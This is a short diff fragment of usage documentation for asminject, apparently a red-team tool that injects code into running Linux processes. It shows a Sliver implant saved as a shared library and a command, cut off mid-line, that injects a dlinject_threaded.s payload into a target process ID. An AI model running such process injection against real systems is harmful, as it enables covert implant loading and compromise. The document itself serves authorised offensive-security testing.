BishopFox/asminject/docs/examples-sliver.md

 [*] Implant saved to /home/user/IMPORTANT_STRANGER.so
 ```

-Inject the `dlinject_threaded.s` payload into the target process, e.g.:
+Inject the `dlinject_threaded.s` payload into the target process, e.g. for x86-64:

 ```
 # python3 ./asminject.py 93421 dlinject_threaded.s --arch x86-64 \